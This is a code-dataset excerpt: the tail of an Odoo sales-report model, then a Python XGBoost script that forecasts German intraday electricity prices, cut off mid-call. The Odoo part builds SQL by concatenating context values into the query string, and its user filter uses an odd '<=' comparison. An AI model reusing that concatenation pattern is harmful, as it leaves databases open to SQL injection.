init_table(self):\n\n tools.drop_view_if_exists(self._cr, self._name.replace(\".\", \"_\"))\n\n select_query = \"\"\" \n SELECT\n ROW_NUMBER () OVER (ORDER BY product_template.name) as id, \n public.product_template.sku_code AS sku_code,\n public.product_template.id AS product_tmpl_id,\n public.product_uom.name AS product_uom,\n SUM(sale_order_line.qty_delivered) AS quantity\n FROM\n public.sale_order\n INNER JOIN\n public.sale_order_line\n ON\n (\n public.sale_order.id = public.sale_order_line.order_id)\n INNER JOIN\n public.product_product\n ON\n (\n public.sale_order_line.product_id = public.product_product.id)\n INNER JOIN\n public.product_template\n ON\n (\n public.product_product.product_tmpl_id = public.product_template.id)\n INNER JOIN\n public.product_uom\n ON\n (\n public.sale_order_line.product_uom = public.product_uom.id)\n \n \"\"\"\n start_date = self.env.context.get('start_date')\n end_date = self.env.context.get('end_date')\n compute_at = self.env.context.get('compute_at')\n user_id = self.env.context.get('user_id')\n\n isWhereClauseAdded = False\n if compute_at:\n if start_date and not start_date is None and end_date and not end_date is None:\n select_query = select_query + \" where sale_order.confirmation_date BETWEEN '\" + str(\n start_date) + \"'\" + \" and '\" + str(self.string_to_date(end_date) + datetime.timedelta(days=1)) + \"'\"\n isWhereClauseAdded = True\n if user_id:\n if isWhereClauseAdded:\n select_query = select_query + \" and \"\n else:\n select_query = select_query + \" where \"\n select_query = select_query + \" sale_order.user_id <='\" + str(user_id) + \"'\"\n\n group_by = \"\"\"\n GROUP BY\n public.product_template.sku_code,\n public.product_template.id,\n public.product_uom.name\n \"\"\"\n\n sql_query = select_query + group_by\n\n self._cr.execute(\"CREATE VIEW \" + self._name.replace(\".\", \"_\") + \" AS ( \" + sql_query + \" )\")\n\n @api.model_cr\n def delete_and_create(self):\n self.init_table()\n\n def string_to_date(self, date_string):\n return datetime.datetime.strptime(date_string, DEFAULT_SERVER_DATE_FORMAT).date()\n","repo_name":"bits-amitrathod/sps","sub_path":"reports/sales_by_count/models/sales_by_count_model.py","file_name":"sales_by_count_model.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36302500257","text":"import os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time\r\nimport plotly.express as px\r\nimport xgboost as xgb\r\nfrom datetime import datetime\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\nfrom collections import defaultdict, Counter\r\nimport xgboost as xgb\r\nfrom sklearn.model_selection import train_test_split, RandomizedSearchCV, cross_val_score, KFold\r\nfrom sklearn.metrics import precision_recall_fscore_support as score\r\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score, mean_absolute_percentage_error\r\nfrom math import sqrt\r\nimport pytz\r\nimport mlflow\r\nimport mlflow.sklearn\r\nmlflow.set_experiment('Tracking_Forecasting_XGBoost')\r\n\r\n\r\ndef reduce_mem_usage(df):\r\n \"\"\"Optimizes the memory usage of a DataFrame by modifying the datatype of each column.\r\n\r\n Args:\r\n df (pd.DataFrame): The Dataframe to optimize\r\n\r\n Returns:\r\n pd.DataFrame: The optimized DataFrame\r\n \"\"\"\r\n\r\n ###iterate through all the columns of a dataframe and modify the data type to reduce memory usage.\r\n start_mem = df.memory_usage().sum() / 1024**2\r\n print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))\r\n for col in df.columns:\r\n col_type = df[col].dtype\r\n if col_type != object:\r\n c_min = df[col].min()\r\n c_max = df[col].max()\r\n if str(col_type)[:3] == 'int':\r\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\r\n df[col] = df[col].astype(np.int8)\r\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\r\n df[col] = df[col].astype(np.int16)\r\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\r\n df[col] = df[col].astype(np.int32)\r\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\r\n df[col] = df[col].astype(np.int64) \r\n else:\r\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\r\n df[col] = df[col].astype(np.float16)\r\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\r\n df[col] = df[col].astype(np.float32)\r\n else:\r\n df[col] = df[col].astype(np.float64)\r\n else:\r\n df[col] = df[col].astype('category')\r\n end_mem = df.memory_usage().sum() / 1024**2\r\n print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))\r\n print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))\r\n return df\r\n\r\n##Accessing csv files from directory\r\ncsv_files = []\r\nstartdate = datetime.strptime(\"2022-01-31 00:00:00\", \"%Y-%m-%d %H:%M:%S\")\r\nenddate = datetime.strptime(\"2022-02-05 23:45:00\", \"%Y-%m-%d %H:%M:%S\")\r\npath = os.path.realpath(os.path.join(os.getcwd(),os.path.dirname(__file__)))\r\nprint(\"Path is:\", path)\r\nfor root, dirs, files in os.walk(path):\r\n for file in files:\r\n if file.startswith(\"pri_de_intraday_vwap_last5min_EURmwh_cet_min15_ca_\") and file.endswith(\".csv\"):\r\n file_date = datetime.strptime(os.path.basename(file), \"pri_de_intraday_vwap_last5min_EURmwh_cet_min15_ca_%Y-%m-%d.csv\")\r\n if startdate <= file_date <= enddate:\r\n csv_files.append(os.path.join(root, file))\r\ncsv_files.reverse()\r\n\r\n##Reading csv file\r\ndef read_csv(file_name):\r\n \"\"\" Reads a CSV file and returns a pandas DataFrame object containing the data from the file.\r\n Args:\r\n file_name (str): The name of the CSV file to be read.\r\n\r\n Returns:\r\n pandas.DataFrame: A pandas dataframe object containing the data from the CSV file.\r\n \"\"\"\r\n df = pd.read_csv(file_name, decimal=\",\", delimiter=\";\", index_col=0)\r\n df.index = pd.to_datetime(df.index, dayfirst=False, utc = True)\r\n df.index = df.index.tz_convert('Europe/Berlin')\r\n df.rename_axis('date', inplace = True)\r\n #Dropping the last rows of the following month to have dates in sync with columns.\r\n df = df.drop(df.loc[df.index > pd.Timestamp(enddate).tz_localize('Europe/Berlin')].index) \r\n return df\r\n\r\n##Data preprocessing\r\ndef preprocess_data(df):\r\n \"\"\" Preprocesses the raw data structure from the CSV files.\r\n Args:\r\n df (pandas.DataFrame): The pandas dataframe with the raw data from csv files\r\n\r\n Returns:\r\n pandas.DataFrame: A preprocessed dataframe\r\n \"\"\"\r\n df.drop(df.columns[0:180], axis = 1, inplace = True) #Dropping all columns for day before until 15:00\r\n df.fillna(axis=1, method='backfill', inplace = True) #Backfill 'NaN' with next corresponding values\r\n\r\n #Removing prices after fullfillment time\r\n for idx, column in enumerate(df.columns):\r\n df.loc[df.index == column, df.columns[(idx+1):]]=None\r\n # df_main.reset_index(inplace=True)\r\n return df\r\n\r\n###Restructuring the dataframe\r\ndef restructure(df_preprocessed):\r\n \"\"\"Restructures the pre-processed dataframe such that it has a single date column and multiple columns representing \r\n the time difference between the date and the original columns in the preprocessed dataframe.\r\n\r\n Args:\r\n df_preprocessed (pandas.DataFrame): A pandas dataframe object containing the preprocessed data.\r\n\r\n Returns:\r\n pandas.DataFrame: A pandas dataframe object containing the restructured data.\r\n \"\"\"\r\n df_preprocessed.reset_index(inplace=True)\r\n df_preprocessed = (df_preprocessed.melt('date', var_name='date2') # reshape the columns to rows\r\n # convert the date strings to datetime and compute the timedelta\r\n .assign(date=lambda d: pd.to_datetime(d['date']),\r\n date2=lambda d: pd.to_datetime(d['date2']),\r\n delta=lambda d: d['date'].sub(d['date2'])\r\n .dt.total_seconds().floordiv(60)\r\n )\r\n # filter out negative timedelta\r\n .loc[lambda d: d['delta'].ge(0)]\r\n # reshape the rows back to columns\r\n .pivot('date', 'delta', 'value')\r\n # rename columns from integer to \"Xmins\"\r\n .rename(columns=lambda x: f'{x:.0f}') \r\n # remove columns axis label\r\n .rename_axis(columns=None)\r\n)\r\n df_preprocessed.loc[df_preprocessed.isna().all(axis=1)] = 0 #Checking for rows with all na values and replacing it with 0\r\n df_preprocessed.dropna(axis='columns', inplace = True) ##Dropping columns with NaN values\r\n df_preprocessed = df_preprocessed[df_preprocessed.columns[::-1]] #Reversing the order of columns\r\n\r\n return df_preprocessed\r\n#For all the rows (products), all prices are available starting from 540 mins(9 hours) before fulfillment time. \r\n\r\ndef access_features_csv(file_name:str):\r\n \"\"\" Reads a CSV file with the given name and returns a pandas dataframe object containing the data from the file.\r\n\r\n Args:\r\n file_name (str): A string that represents the name of the CSV file to be read.\r\n\r\n Returns:\r\n pandas.DataFrame: A pandas dataframe object containing the data from the CSV file.\r\n \"\"\"\r\n path = os.path.realpath(os.path.join(os.getcwd(),os.path.dirname(__file__)))\r\n # print(\"Path of csv is:\", path)\r\n for root, dirs, files in os.walk(path):\r\n for file in files:\r\n if file.startswith(file_name) and file.endswith(\".csv\"):\r\n file_path = os.path.join(root, file)\r\n df = pd.read_csv(file_path, decimal=\",\", delimiter=\";\", index_col=0)\r\n df.index = pd.to_datetime(df.index, dayfirst=False, utc = True) #Converting index into Timestamp type\r\n df = df.fillna(0)\r\n return df\r\n\r\ndef feature_sys_imb(df_product, df_imb):\r\n \"\"\"Adds system imbalance volume column with an offset of 30 minutes to the input dataframe.\r\n\r\n Args:\r\n df_product (pandas.DataFrame): Pandas restructed dataframe that contains the product data.\r\n df_imb (pandas.DataFrame): Pandas dataframe containing the system imbalance data.\r\n\r\n Returns:\r\n pandas.DataFrame: A pandas dataframe containing the input product data with an additional column for system imbalance volume.\r\n \"\"\"\r\n anchor_time = pd.to_datetime(df_product.columns[-1])\r\n lookback_minutes = 30\r\n df_product['date'] = pd.to_numeric(df_product['date'])\r\n df_product_imb = pd.DataFrame(df_product.set_index(anchor_time - pd.to_timedelta(df_product['date'],unit='min') - pd.to_timedelta(lookback_minutes, unit='min'))\r\n .join(df_imb).reset_index(drop=True))\r\n df_product_imb['VOL_IMB_DE'].fillna(method='ffill',inplace=True)\r\n return df_product_imb\r\n\r\ndef feature_rdl(df_product_imb, df_rdl):\r\n \"\"\"Adds residual load column with an offset of 30 minutes to the input Dataframe 'df_product_imb'.\r\n\r\n Args:\r\n df_product_imb (pandas.DataFrame): Pandas dataframe that contains the product data and system imbalance volume data.\r\n df_rdl (pandas.DataFrame): Pandas dataframe containing residual load data.\r\n\r\n Returns:\r\n pandas.DataFrame: It returns a pandas DataFrame with residual load column added to the input df_product_imb.\r\n \"\"\"\r\n anchor_time = pd.to_datetime(df_product_imb.columns[-2])\r\n lookback_minutes = 60\r\n df_imb_rdl = pd.DataFrame(df_product_imb.set_index(anchor_time - pd.to_timedelta(df_product_imb['date'] + lookback_minutes, unit='min'))\r\n .join(df_rdl).reset_index(drop=True))\r\n df_imb_rdl['Residual_Load_DE'].fillna(method='ffill',inplace=True)\r\n # df_imb_rdl.set_index(\"date\", inplace = True)\r\n return df_imb_rdl\r\n\r\ndef feature_spv(df_imb_rdl, df_spv):\r\n \"\"\"Adds the solar pv protection with no offset to input DataFrame 'df_imb_rdl'.\r\n\r\n Args:\r\n df_imb_rdl (pandas.DataFrame): Pandas dataframe that contains product data, system imbalance volume data and residual load.\r\n df_spv (pandas.DataFrame): Pandas dataframe containing solar pv data.\r\n\r\n Returns:\r\n pandas.DataFrame: Pandas DataFrame with solar pv column added to the input 'df_imb_rdl'.\r\n \"\"\"\r\n df_imb_rdl_spv = pd.DataFrame(df_imb_rdl.set_index(pd.to_datetime(df_imb_rdl.columns[-3]) + pd.to_timedelta(-df_imb_rdl['date'], unit='min'))\r\n .join(df_spv).reset_index(drop=True) )\r\n df_imb_rdl_spv['Solar_Power_DE'].fillna(method='ffill',inplace=True)\r\n # df_imb_rdl_spv.set_index(\"date\", inplace = True) \r\n return df_imb_rdl_spv\r\n\r\ndef feature_wnd(df_imb_rdl_spv, df_wnd):\r\n \"\"\"Adds the wind protection with no offset to input DataFrame 'df_imb_rdl_spv'.\r\n\r\n Args:\r\n df_imb_rdl_spv (pandas.DataFrame): Pandas dataframe that contains product data, system imbalance volume data,residual load and solar pv data.\r\n df_wnd (_type_): Pandas dataframe containing wind production data.\r\n\r\n Returns:\r\n pandas.DataFrame: Pandas DataFrame with wind production column added to the input 'df_imb_rdl_spv'.\r\n \"\"\"\r\n df_imb_rdl_spv_wnd = pd.DataFrame(df_imb_rdl_spv.set_index(pd.to_datetime(df_imb_rdl_spv.columns[-4]) + pd.to_timedelta(-df_imb_rdl_spv['date'], unit='min'))\r\n .join(df_wnd).reset_index(drop=True) )\r\n df_imb_rdl_spv_wnd['Wind_Power_DE'].fillna(method='ffill',inplace=True)\r\n df_imb_rdl_spv_wnd.set_index(\"date\", inplace = True) \r\n return df_imb_rdl_spv_wnd\r\n\r\ndef minutes_to_timestamp(df):\r\n \"\"\"Converts the 'time_before_fulfilment' column in minutes to timestamp format and set it as the index of the input dataframe.\r\n\r\n Args:\r\n df (pandas.DataFrame): The input dataframe containing the 'time_before_fulfilment' column to be converted to timestamp format.\r\n\r\n Returns:\r\n pandas.DataFrame: The modified dataframe with the 'time_before_fulfilment' column converted to timestamp format and set as the index.\r\n \"\"\"\r\n### Replacing minutes before fulfilment column to timestamp \r\n df['time_before_fulfilment'] = (pd.to_timedelta(df['time_before_fulfilment'], unit='min')\r\n .rsub(pd.to_datetime(df.columns[1]))\r\n )\r\n df.set_index('time_before_fulfilment', inplace=True)\r\n df.index = df.index.tz_convert(pytz.FixedOffset(60))\r\n\r\n ##Converting the column name from type timestamp to str\r\n timestamp = pd.Timestamp(df.columns[0])\r\n date_string = timestamp.strftime('%Y-%m-%d %H:%M:%S%z')\r\n df = df.rename(columns={df.columns[0]: date_string})\r\n df\r\n return df\r\n\r\ndef add_lags(df):\r\n \"\"\"Adds three lag columns to the input DataFrame.\r\n\r\n\r\n Args:\r\n df (pandas.DataFrame): The input DataFrame is the one that was modified in function 'minutes_to_timestamp'.\r\n\r\n Returns:\r\n pandas.DataFrame: The DataFrame with three additional columns 'lag1', 'lag2', and 'lag3'.\r\n \"\"\"\r\n col = df.iloc[:, 0]\r\n target_map = col.to_dict()\r\n target_map\r\n df['lag1'] = (df.index -pd.Timedelta('3 hours')).map(target_map)\r\n df['lag2'] = (df.index -pd.Timedelta('4 hours')).map(target_map)\r\n df['lag3'] = (df.index -pd.Timedelta('5 hours')).map(target_map)\r\n\r\n return df\r\n\r\ndef cross_validation(df):\r\n \"\"\"Splits the input dataframe into train and test sets using time series split and returns the necessary features and targets for each set.\r\n\r\n Args:\r\n df (pandas.DataFrame): Input dataframe is the dataframe that includes lags.\r\n\r\n Returns:\r\n tuple: A tuple containing the following elements:\r\n - pandas.DataFrame: The training data.\r\n - pandas.DataFrame: The validation data.\r\n - pandas.DataFrame: The features for the training data.\r\n - pandas.DataFrame: The target for the training data.\r\n - pandas.DataFrame: The features for the validation data.\r\n - pandas.DataFrame: The target for the validation data.\r\n - list: A list of feature names.\r\n - list: A list of target names.\r\n \"\"\"\r\n tss = TimeSeriesSplit(n_splits = 5)\r\n df = df.sort_index()\r\n\r\n for train_idx, val_idx in tss.split(df):\r\n train = df.iloc[train_idx]\r\n test = df.iloc[val_idx]\r\n\r\n FEATURES = ['VOL_IMB_DE','Residual_Load_DE','Solar_Power_DE','Wind_Power_DE', 'lag1', 'lag2', 'lag3']\r\n TARGET = [df.columns[0]]\r\n\r\n X_train = train[FEATURES] \r\n y_train = train[TARGET]\r\n\r\n X_test = test[FEATURES] \r\n y_test = test[TARGET]\r\n\r\n return train, test, X_train, y_train, X_test, y_test, FEATURES, TARGET\r\n\r\ndef random_search_optimization(X_train, y_train):\r\n \"\"\"Performs hyperparameter optimization using Random Search algorithm on a XGBoost model.\r\n\r\n Args:\r\n X_train (pandas.DataFrame): The feature matrix of training data.\r\n y_train (pandas.DataFrame): The target vector of training data.\r\n\r\n Returns:\r\n sklearn.model_selection.RandomizedSearchCV: The optimized XGBoost model.\r\n \"\"\"\r\n ### Optimization Algorithm - Random Search\r\n params = {\r\n 'max_depth': range(3,10),\r\n 'learning_rate': [0.0001, 0.001, 0.01, 0.1, 0.02, 0.2, 0.03, 0.3, 0.04, 0.4, 0.05, 0.5, 0.6, 1.0],\r\n 'n_estimators' : [100,500,1000,2000],\r\n 'subsample': [0.5, 0.6, 0.7, 0.8, 0.9, 1.0],\r\n 'colsample_bytree': [0.6, 0.7, 0.8, 0.9, 1.0],\r\n 'colsample_bylevel': np.arange(0.4, 1.0, 0.1),\r\n 'gamma' : [0, 0.1, 0.2, 0.3, 0.4],\r\n 'min_child_weight' : [1,5,10,15],\r\n 'reg_alpha': [0, 0.1, 0.5, 1, 10],\r\n 'reg_lambda': [0, 0.1, 0.5, 1, 10]\r\n }\r\n ### Set up the k-fold cross-validation\r\n kfold = KFold(n_splits=4, shuffle=True, random_state=10)\r\n\r\n xgb_rs = xgb.XGBRegressor(seed = 20).fit(X_train, y_train)\r\n\r\n model_random_search = RandomizedSearchCV(\r\n estimator=xgb_rs,\r\n param_distributions=params,\r\n scoring='neg_mean_squared_error',\r\n cv = kfold,\r\n n_jobs = -1, \r\n n_iter=25,\r\n verbose=1)\r\n\r\n ###Fit Random Search\r\n rs_params = model_random_search.fit(X_train, y_train)\r\n\r\n return rs_params\r\n \r\ndef get_common_parameters(xgboost_rs_results):\r\n \"\"\"Get the highest occurring parameter values.\r\n\r\n Args:\r\n xgboost_rs_results (list): A list of dictionaries containing the results of random search optimization for XGBoost.\r\n\r\n Returns:\r\n list: A list of dictionaries containing the top parameter values that occurred the most frequently in the random search optimization.\r\n \"\"\"\r\n param_counts_by_value = defaultdict(Counter)\r\n for d in xgboost_rs_results:\r\n for k, v in d.items():\r\n param_counts_by_value[k][v] += 1\r\n\r\n top_param_values = [{top_params: value_counts.most_common(1)[0][0]} for top_params, value_counts in param_counts_by_value.items()]\r\n\r\n return top_param_values\r\n\r\ndef top_parameters(top_param_values):\r\n \"\"\"Combines list of dictionaries into one dictionary.\r\n\r\n Args:\r\n top_param_values (list[dict]): A list of dictionaries containing the top parameter values.\r\n\r\n Returns:\r\n dict: A dictionary containing the combined top parameter values.\r\n \"\"\"\r\n parameters_dict = {}\r\n parameters_dict = {k: v for d in top_param_values for k, v in d.items()}\r\n return parameters_dict\r\n\r\ndef xgbmodel(X_train, y_train, X_test, y_test, top_parameters_dict):\r\n \"\"\"Trains an XGBoost model with the specified hyperparameters using the given training data, and evaluates its performance on the given test data.\r\n\r\n Args:\r\n X_train (numpy.ndarray): A 2D array containing the features of the training data.\r\n y_train (numpy.ndarray): A 1D array containing the target values of the training data.\r\n X_test (numpy.ndarray): A 2D array containing the features of the test data.\r\n y_test (numpy.ndarray): A 1D array containing the target values of the test data.\r\n top_parameters_dict (dict): A dictionary containing the best hyperparameters found during hyperparameter tuning.\r\n\r\n Returns:\r\n xgb.XGBRegressor: The trained XGBoost model.\r\n \"\"\"\r\n model = xgb.XGBRegressor(base_score=0.5, objective= 'reg:squarederror', booster = 'gbtree', early_stopping_rounds = 20, \r\n n_estimators = top_parameters_dict['n_estimators'], max_depth = top_parameters_dict['max_depth'], \r\n learning_rate = top_parameters_dict['learning_rate'], colsample_bytree = top_parameters_dict['colsample_bytree'],\r\n colsample_bylevel = top_parameters_dict['colsample_bylevel'], subsample = top_parameters_dict['subsample'],\r\n min_child_weight = top_parameters_dict['min_child_weight'], gamma = top_parameters_dict['gamma'],\r\n reg_alpha = top_parameters_dict['reg_alpha'], reg_lambda = top_parameters_dict['reg_lambda'] ) \r\n model.fit(X_train, y_train,\r\n eval_set = [(X_train, y_train), (X_test, y_test)],\r\n verbose = 1, eval_metric = 'rmse')\r\n return model\r\n\r\ndef plot_product_graph(df):\r\n \"\"\"Plots the time-series graph of product and its features for a given DataFrame.\r\n\r\n Args:\r\n df (pandas.DataFrame): The DataFrame containing the product and features data.\r\n \"\"\"\r\n fig = px.line(df, x = df.index, y = [df.columns[0],'VOL_IMB_DE','Residual_Load_DE','Solar_Power_DE','Wind_Power_DE'] , markers='.')\r\n\r\n fig.update_xaxes(\r\n rangeslider_visible=True,\r\n rangeselector=dict(\r\n buttons=list([\r\n dict(count = 1, label = \"1H\", step = \"hour\", stepmode =\"backward\"),\r\n dict(step=\"all\")\r\n ])\r\n )\r\n )\r\n fig.show()\r\n\r\ndef predict_against_test(model, X_test,):\r\n \"\"\"Predicts target values against test dataset using trained model.\r\n\r\n Args:\r\n model (object): A trained model object which can predict.\r\n X_test (pd.DataFrame): The test input data for prediction.\r\n\r\n Returns:\r\n np.ndarray: The predicted target values.\r\n \"\"\"\r\n y_pred = model.predict(X_test)\r\n return y_pred\r\n\r\ndef forecast_plot(df):\r\n \"\"\"Generates plot for IDC electricity market price forecast using XGBoost.\r\n\r\n Args:\r\n df (pandas.DataFrame): A dataframe containing columns with past prices, forecasted prices and real prices.\r\n \"\"\"\r\n fig = px.line(df, x = df.index, y = [df.columns[0],'Forecasted Prices', 'Real Prices'], markers='.',\r\n title = f'IDC electricity market price forecast using XGBoost for: {df.columns[0]}'\r\n ) \r\n fig.update_xaxes(\r\n title = 't-minutes before fulfillment',\r\n tickangle = -90,\r\n\r\n # autorange=\"reversed\",\r\n # rangeslider_visible=True,\r\n rangeselector=dict(\r\n buttons=list([\r\n dict(count = 1, label = \"1H\", step = \"hour\", stepmode =\"backward\"),\r\n dict(step=\"all\")\r\n ])\r\n )\r\n )\r\n fig.update_yaxes(title=\"IDC Price VWAP5Minutes [€/MWh]\")\r\n fig.update_traces(\r\n name=\"Past Prices\", # change the name of the first y-axis attribute\r\n selector=dict(name=df.columns[0])\r\n )\r\n fig.update_layout(legend_title_text=\"\")\r\n fig.show()\r\n\r\ndef eval_metrics(actual, pred, df):\r\n \"\"\"Calculate evaluation metrics and log them to MLflow.\r\n\r\n Args:\r\n actual (np.array): Array of actual values.\r\n pred (np.array): Array of predicted values.\r\n df (pd.DataFrame): Dataframe containing the original data.\r\n\r\n Returns:\r\n Tuple(float, float, float): Tuple containing the MAE, RMSE, and MAPE.\r\n \"\"\"\r\n mae = mean_absolute_error(actual, pred)\r\n print(\"MAE : \"+str(mae))\r\n\r\n rmse = sqrt(mean_squared_error(actual, pred))\r\n print(\"RMSE : \"+str(rmse))\r\n\r\n r2 = r2_score(actual, pred)\r\n print(\"R2 : \"+str(r2))\r\n\r\n mape = mean_absolute_percentage_error (actual, pred)\r\n print(\"MAPE : \"+str(mape))\r\n\r\n mlflow.log_param(\"Timestamp\", df.columns[0])\r\n mlflow.log_metric(\"rmse\", rmse)\r\n mlflow.log_metric(\"mae\", mae)\r\n mlflow.log_metric(\"mape\", mape)\r\n\r\n return mae, rmse, mape\r\n \r\n\r\n############################## Mainline processing starts here #############################################\r\ndef main():\r\n start = time.time()\r\n\r\n print(\"**Execution Starts!!**\")\r\n ##Merging the files into one dataframe\r\n df = pd.merge(\r\n read_csv(csv_files.pop()),\r\n read_csv(csv_files.pop()),\r\n left_index=True, \r\n right_index=True\r\n )\r\n while csv_files:\r\n df = pd.merge(\r\n df, \r\n read_csv(csv_files.pop()), \r\n left_index=True, \r\n right_index=True,\r\n how='outer'\r\n )\r\n print(\"Files merged into one dataframe\")\r\n print(df)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n print(\"**Preprocessing starts!**\")\r\n df_pre = preprocess_data(df)\r\n print(\"**Preprocessing done!**\")\r\n print(df_pre)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n print(\"**Restructuring starts!**\")\r\n df_re = restructure(df_pre)\r\n print(\"**Restructuring done!**\")\r\n print(df_re)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n ##Transposing the dataframe.\r\n df_transposed = df_re.rename_axis(index=None, columns='date').T\r\n print(\"Transposed Data\")\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n df_full = df_transposed.copy()\r\n reduce_mem_usage(df_full)\r\n print(\"DF Full\")\r\n print(df_full)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n ###Reading the sys vol imb csv\r\n print(\"Reading system volume imbalance data...\")\r\n df_imb = access_features_csv('vol_de_imb_sys_mw_cet_min15_a_2022')\r\n df_imb.rename(columns={'vol de imb sys mw cet min15 a':'VOL_IMB_DE'}, inplace=True) #Renaming column\r\n df_imb = df_imb.fillna(0)\r\n\r\n ###Reading file for residual load\r\n print(\"Reading residual load data...\")\r\n df_rdl = access_features_csv('rdl_de_mwhh_cet_min15_a_2022')\r\n df_rdl.rename(columns={'rdl de mwh/h cet min15 a':'Residual_Load_DE'}, inplace=True) #Renaming column\r\n df_rdl = df_rdl.fillna(0)\r\n\r\n ###Reading file for solar pv production\r\n print(\"Reading Solar PV production data...\")\r\n df_spv = access_features_csv('pro_de_spv_mwhh_cet_min15_a_2022')\r\n df_spv.rename(columns={'pro de spv mwh/h cet min15 a':'Solar_Power_DE'}, inplace=True) #Renaming column\r\n df_spv = df_spv.fillna(0)\r\n \r\n ###Reading file for wind power\r\n print(\"Reading wind production data...\")\r\n df_wnd = access_features_csv('pro_de_wnd_mwhh_cet_min15_a_2022.csv')\r\n df_wnd.rename(columns={'pro de wnd mwh/h cet min15 a':'Wind_Power_DE'}, inplace=True) #Renaming column\r\n df_wnd = df_wnd.fillna(0)\r\n \r\n print(\"################################################################################################################################\")\r\n\r\n ###Creating lists to store results. \r\n df_fi = pd.DataFrame()\r\n xgboost_rs_results = []\r\n preds = []\r\n\r\n print(\"Running functions on each column...\")\r\n for col in df_full.columns[:]:\r\n # create a new DataFrame with only the current column\r\n col_df = df_full[[col]]\r\n col_df.reset_index(inplace=True)\r\n print(\"Col_DF:\")\r\n print(col_df)\r\n\r\n ### perform functions on col_df here\r\n print(\"Adding the sys imb vol column with offset of 30 mins.\")\r\n df_product_imb = feature_sys_imb(col_df, df_imb)\r\n # print(df_product_imb)\r\n print(\"Adding the residual column with offset of 60 mins.\")\r\n df_imb_rdl = feature_rdl(df_product_imb, df_rdl)\r\n # print(df_imb_rdl)\r\n print(\"Adding the solar pv protection with no offset.\")\r\n df_imb_rdl_spv = feature_spv(df_imb_rdl, df_spv)\r\n # print(df_imb_rdl_spv)\r\n print(\"Adding the wind power with no offset.\")\r\n df_imb_rdl_spv_wnd = feature_wnd(df_imb_rdl_spv, df_wnd)\r\n # print(df_imb_rdl_spv_wnd)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n df_main = df_imb_rdl_spv_wnd.copy()\r\n df_main.reset_index(inplace = True)\r\n df_main.rename(columns={'date':'time_before_fulfilment'},inplace=True)\r\n print(\"Df of\",df_main.columns[0])\r\n print(df_main)\r\n \r\n print(\"################################################################################################################################\")\r\n\r\n df_main = minutes_to_timestamp(df_main)\r\n print(\"DF_MAIN\", df_main)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n df_main = add_lags(df_main)\r\n print(\"Adding lags to dataframe...\")\r\n print(df_main)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n print(\"Splitting dataset using cross validation...\")\r\n train, test, X_train, y_train, X_test, y_test, FEATURES, TARGET = cross_validation(df_main)\r\n \r\n print(\"################################################################################################################################\")\r\n\r\n print(\"Running XGBoost model with Random Search Optimization Algorithm for\", df_main.columns[0])\r\n model_rs_result = random_search_optimization(X_train, y_train)\r\n print(\"Best parameters : \", model_rs_result.best_params_)\r\n print(\"Lowest RMSE : \", (-model_rs_result.best_score_)**(1/2.0))\r\n print(\"Optimized learing rate is : \",model_rs_result.best_params_['learning_rate'])\r\n xgboost_rs_results.append(model_rs_result.best_params_)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n ###\"Getting the highest occuring parameter values...\"\r\n top_param_values = get_common_parameters(xgboost_rs_results)\r\n \r\n print(\"################################################################################################################################\")\r\n\r\n ###Combining list of dictionaries into one dictionary\r\n top_parameters_dict = top_parameters(top_param_values)\r\n print(\"Common parameters in a dict: \",top_parameters_dict)\r\n print(\"Length of List of XGBoost RS result : \", len(xgboost_rs_results))\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n ### *********Enter the product for which you wish to forecast********\r\n df_future = pd.DataFrame(df_full['2022-02-04 19:45:00+01:00']) \r\n \r\n ### ***Will pick a random product to forecast on ***\r\n # df_future = df_full.sample(axis='columns')\r\n\r\n df_future.reset_index(inplace=True)\r\n print(\"Product to forecast on is: \",df_future.columns[1])\r\n print(df_future)\r\n\r\n ### Adding corresponding features to the product selected.\r\n print(\"Adding the sys imb vol column with offset of 30 mins.\")\r\n df_future_imb = feature_sys_imb(df_future, df_imb)\r\n print(\"Adding the residual column with offset of 60 mins.\")\r\n df_future_imb_rdl = feature_rdl(df_future_imb, df_rdl)\r\n print(\"Adding the solar pv protection with no offset.\")\r\n df_future_imb_rdl_spv = feature_spv(df_future_imb_rdl, df_spv)\r\n print(\"Adding the wind power with no offset.\")\r\n df_future_imb_rdl_spv_wnd = feature_wnd(df_future_imb_rdl_spv, df_wnd)\r\n\r\n print(\"################################################################################################################################\")\r\n \r\n df_future = df_future_imb_rdl_spv_wnd.copy()\r\n df_future.reset_index(inplace = True)\r\n df_future.rename(columns={'date':'time_before_fulfilment'},inplace=True)\r\n print(\"Future Df of product: \",df_future.columns[0])\r\n print(df_future)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n df_future = minutes_to_timestamp(df_future)\r\n\r\n df_future = add_lags(df_future )\r\n print(\"Adding lags to dataframe...\")\r\n \r\n print(\"################################################################################################################################\")\r\n\r\n print(\"Splitting future dataset using cross validation...\")\r\n train_future, test_future, X_train_future, y_train_future, X_test_future, y_test_future, FEATURES_future, TARGET_future = cross_validation(df_future)\r\n print(\"################################################################################################################################\")\r\n\r\n print(\"Applying top optimized parameters to train the XGBoost model...\")\r\n mlflow.xgboost.autolog()\r\n with mlflow.start_run():\r\n model_xgb = xgbmodel(X_train_future, y_train_future, 